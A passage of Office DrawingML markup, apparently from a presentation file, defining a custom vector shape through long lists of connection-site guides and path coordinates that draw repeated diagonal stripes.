              <a:gd name="connsiteY736" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX737" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY737" fmla="*/ 18633514 h 26946982"/>
              <a:gd name="connsiteX738" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY738" fmla="*/ 18753542 h 26946982"/>
              <a:gd name="connsiteX739" fmla="*/ 5199326 w 23952872"/>
              <a:gd name="connsiteY739" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX740" fmla="*/ 5072318 w 23952872"/>
              <a:gd name="connsiteY740" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX741" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY741" fmla="*/ 18880549 h 26946982"/>
              <a:gd name="connsiteX742" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY742" fmla="*/ 19000577 h 26946982"/>
              <a:gd name="connsiteX743" fmla="*/ 4952290 w 23952872"/>
              <a:gd name="connsiteY743" fmla="*/ 2 h 26946982"/>
              <a:gd name="connsiteX744" fmla="*/ 4705278 w 23952872"/>
              <a:gd name="connsiteY744" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX745" fmla="*/ 4825312 w 23952872"/>
              <a:gd name="connsiteY745" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX746" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY746" fmla="*/ 19127556 h 26946982"/>
              <a:gd name="connsiteX747" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY747" fmla="*/ 19247592 h 26946982"/>
              <a:gd name="connsiteX748" fmla="*/ 4458249 w 23952872"/>
              <a:gd name="connsiteY748" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX749" fmla="*/ 4578277 w 23952872"/>
              <a:gd name="connsiteY749" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX750" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY750" fmla="*/ 19374591 h 26946982"/>
              <a:gd name="connsiteX751" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY751" fmla="*/ 19494618 h 26946982"/>
              <a:gd name="connsiteX752" fmla="*/ 4211226 w 23952872"/>
              <a:gd name="connsiteY752" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX753" fmla="*/ 4331248 w 23952872"/>
              <a:gd name="connsiteY753" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX754" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY754" fmla="*/ 19621620 h 26946982"/>
              <a:gd name="connsiteX755" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY755" fmla="*/ 19741645 h 26946982"/>
              <a:gd name="connsiteX756" fmla="*/ 3964196 w 23952872"/>
              <a:gd name="connsiteY756" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX757" fmla="*/ 4084225 w 23952872"/>
              <a:gd name="connsiteY757" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX758" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY758" fmla="*/ 19868646 h 26946982"/>
              <a:gd name="connsiteX759" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY759" fmla="*/ 19988671 h 26946982"/>
              <a:gd name="connsiteX760" fmla="*/ 3717195 w 23952872"/>
              <a:gd name="connsiteY760" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX761" fmla="*/ 3837201 w 23952872"/>
              <a:gd name="connsiteY761" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX762" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY762" fmla="*/ 20115667 h 26946982"/>
              <a:gd name="connsiteX763" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY763" fmla="*/ 20235673 h 26946982"/>
              <a:gd name="connsiteX764" fmla="*/ 3470149 w 23952872"/>
              <a:gd name="connsiteY764" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX765" fmla="*/ 3590189 w 23952872"/>
              <a:gd name="connsiteY765" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX766" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY766" fmla="*/ 20362682 h 26946982"/>
              <a:gd name="connsiteX767" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY767" fmla="*/ 20482718 h 26946982"/>
              <a:gd name="connsiteX768" fmla="*/ 3223131 w 23952872"/>
              <a:gd name="connsiteY768" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX769" fmla="*/ 3343160 w 23952872"/>
              <a:gd name="connsiteY769" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX770" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY770" fmla="*/ 20609708 h 26946982"/>
              <a:gd name="connsiteX771" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY771" fmla="*/ 20729736 h 26946982"/>
              <a:gd name="connsiteX772" fmla="*/ 2976102 w 23952872"/>
              <a:gd name="connsiteY772" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX773" fmla="*/ 3096141 w 23952872"/>
              <a:gd name="connsiteY773" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX774" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY774" fmla="*/ 20856726 h 26946982"/>
              <a:gd name="connsiteX775" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY775" fmla="*/ 20976765 h 26946982"/>
              <a:gd name="connsiteX776" fmla="*/ 2729079 w 23952872"/>
              <a:gd name="connsiteY776" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX777" fmla="*/ 2849118 w 23952872"/>
              <a:gd name="connsiteY777" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX778" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY778" fmla="*/ 21103749 h 26946982"/>
              <a:gd name="connsiteX779" fmla="*/ 23952867 w 23952872"/>
              <a:gd name="connsiteY779" fmla="*/ 21223789 h 26946982"/>
              <a:gd name="connsiteX780" fmla="*/ 2482066 w 23952872"/>
              <a:gd name="connsiteY780" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX781" fmla="*/ 2602083 w 23952872"/>
              <a:gd name="connsiteY781" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX782" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY782" fmla="*/ 21350784 h 26946982"/>
              <a:gd name="connsiteX783" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY783" fmla="*/ 21470802 h 26946982"/>
              <a:gd name="connsiteX784" fmla="*/ 2235048 w 23952872"/>
              <a:gd name="connsiteY784" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX785" fmla="*/ 2355065 w 23952872"/>
              <a:gd name="connsiteY785" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX786" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY786" fmla="*/ 21597805 h 26946982"/>
              <a:gd name="connsiteX787" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY787" fmla="*/ 21717820 h 26946982"/>
              <a:gd name="connsiteX788" fmla="*/ 1988014 w 23952872"/>
              <a:gd name="connsiteY788" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX789" fmla="*/ 2108052 w 23952872"/>
              <a:gd name="connsiteY789" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX790" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY790" fmla="*/ 21844818 h 26946982"/>
              <a:gd name="connsiteX791" fmla="*/ 23952871 w 23952872"/>
              <a:gd name="connsiteY791" fmla="*/ 21964858 h 26946982"/>
              <a:gd name="connsiteX792" fmla="*/ 1740996 w 23952872"/>
              <a:gd name="connsiteY792" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX793" fmla="*/ 1861012 w 23952872"/>
              <a:gd name="connsiteY793" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX794" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY794" fmla="*/ 22091855 h 26946982"/>
              <a:gd name="connsiteX795" fmla="*/ 23952871 w 23952872"/>
              <a:gd name="connsiteY795" fmla="*/ 22211876 h 26946982"/>
              <a:gd name="connsiteX796" fmla="*/ 1493972 w 23952872"/>
              <a:gd name="connsiteY796" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX797" fmla="*/ 1613989 w 23952872"/>
              <a:gd name="connsiteY797" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX798" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY798" fmla="*/ 22338878 h 26946982"/>
              <a:gd name="connsiteX799" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY799" fmla="*/ 22458896 h 26946982"/>
              <a:gd name="connsiteX800" fmla="*/ 1246949 w 23952872"/>
              <a:gd name="connsiteY800" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX801" fmla="*/ 1366982 w 23952872"/>
              <a:gd name="connsiteY801" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX802" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY802" fmla="*/ 22585888 h 26946982"/>
              <a:gd name="connsiteX803" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY803" fmla="*/ 22705920 h 26946982"/>
              <a:gd name="connsiteX804" fmla="*/ 999919 w 23952872"/>
              <a:gd name="connsiteY804" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX805" fmla="*/ 1119947 w 23952872"/>
              <a:gd name="connsiteY805" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX806" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY806" fmla="*/ 22832918 h 26946982"/>
              <a:gd name="connsiteX807" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY807" fmla="*/ 22952949 h 26946982"/>
              <a:gd name="connsiteX808" fmla="*/ 752907 w 23952872"/>
              <a:gd name="connsiteY808" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX809" fmla="*/ 872924 w 23952872"/>
              <a:gd name="connsiteY809" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX810" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY810" fmla="*/ 23079945 h 26946982"/>
              <a:gd name="connsiteX811" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY811" fmla="*/ 23199961 h 26946982"/>
              <a:gd name="connsiteX812" fmla="*/ 505878 w 23952872"/>
              <a:gd name="connsiteY812" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX813" fmla="*/ 625905 w 23952872"/>
              <a:gd name="connsiteY813" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX814" fmla="*/ 23952871 w 23952872"/>
              <a:gd name="connsiteY814" fmla="*/ 23326960 h 26946982"/>
              <a:gd name="connsiteX815" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY815" fmla="*/ 23446990 h 26946982"/>
              <a:gd name="connsiteX816" fmla="*/ 258854 w 23952872"/>
              <a:gd name="connsiteY816" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX817" fmla="*/ 378882 w 23952872"/>
              <a:gd name="connsiteY817" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX818" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY818" fmla="*/ 23573987 h 26946982"/>
              <a:gd name="connsiteX819" fmla="*/ 23952871 w 23952872"/>
              <a:gd name="connsiteY819" fmla="*/ 23694011 h 26946982"/>
              <a:gd name="connsiteX820" fmla="*/ 11831 w 23952872"/>
              <a:gd name="connsiteY820" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX821" fmla="*/ 131864 w 23952872"/>
              <a:gd name="connsiteY821" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX822" fmla="*/ 23952871 w 23952872"/>
              <a:gd name="connsiteY822" fmla="*/ 23821007 h 26946982"/>
              <a:gd name="connsiteX823" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY823" fmla="*/ 23941035 h 2694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Lst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="23952872" h="26946982">
                <a:moveTo>
                  <a:pt x="7" y="26793701"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="153283" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33255" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26913728"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="26546677"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400306" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280280" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26666704"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="26299654"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="647330" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="527302" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26419681"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="26052627"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="894353" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774326" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="26172654"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="25805604"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1141377" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1021350" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="25925631"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="25558583"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1388400" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268373" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="25678610"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="25311557"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1635424" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1515397" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="25431587"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="25064536"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1882447" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1762420" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="25184563"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="24817512"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2129470" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2009444" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="24937540"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="24570489"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2376494" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2256467" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="24690516"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="24323464"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2623518" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2503491" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="24443493"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="24076441"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2870541" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2750514" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="24196469"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="23829417"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3117565" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2997537" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="23949446"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="23582391"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3364588" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3244561" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="23702419"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="23335371"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3611612" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3491585" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="23455398"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="23088347"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3858635" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3738608" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="23208372"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="22841321"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4105659" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3985632" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="22961351"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="22594297"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4352682" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4232655" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="22714327"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="22347277"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4599706" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479679" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="22467304"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="22100253"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4846730" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4726702" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="22220280"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="21853230"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5093753" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4973726" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="21973257"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="21606206"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5340776" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5220749" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="21726233"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="21359182"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5587800" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5467773" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="21479210"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="21112156"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5834823" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5714796" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="21232186"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="20865132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6081847" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5961820" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="20985163"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="20618111"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6328871" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6208843" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="20738136"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="20371085"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6575894" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6455867" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="20491113"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="20124064"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6822917" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6702890" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="20244092"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="19877044"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7069941" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6949914" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="19997066"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="19630020"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7316966" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7196937" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="19750045"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="19382994"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7563990" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7443961" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="19503024"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="19135973"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7811013" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7690984" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="19256000"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="18888947"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058036" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7938008" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="19008974"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="18641923"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8305060" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8185032" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="18761950"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="18394900"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8552084" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8432055" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="18514927"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="18147874"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8799107" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8679078" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="18267904"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="17900853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9046131" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8926102" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="18020883"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="17653827"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9293154" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9173126" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="17773854"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="17406809"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9540178" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9420151" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="17526833"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="17159782"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9787201" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9667174" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="17279812"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="16912762"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10034225" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914198" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="17032789"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="16665738"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10281248" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10161221" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="16785763"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="16418712"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10528272" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10408244" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="16538739"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="16171691"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10775295" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10655268" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="16291716"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="15924665"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11022319" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10902292" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="16044692"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="15677641"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11269342" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11149315" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15797671"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="15430617"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11516366" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11396339" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15550645"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="15183594"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11763389" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11643362" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15303622"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="14936570"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12010413" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11890386" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15056601"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="14689549"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12257436" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12137409" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14809575"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="14442523"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12504459" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12384433" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
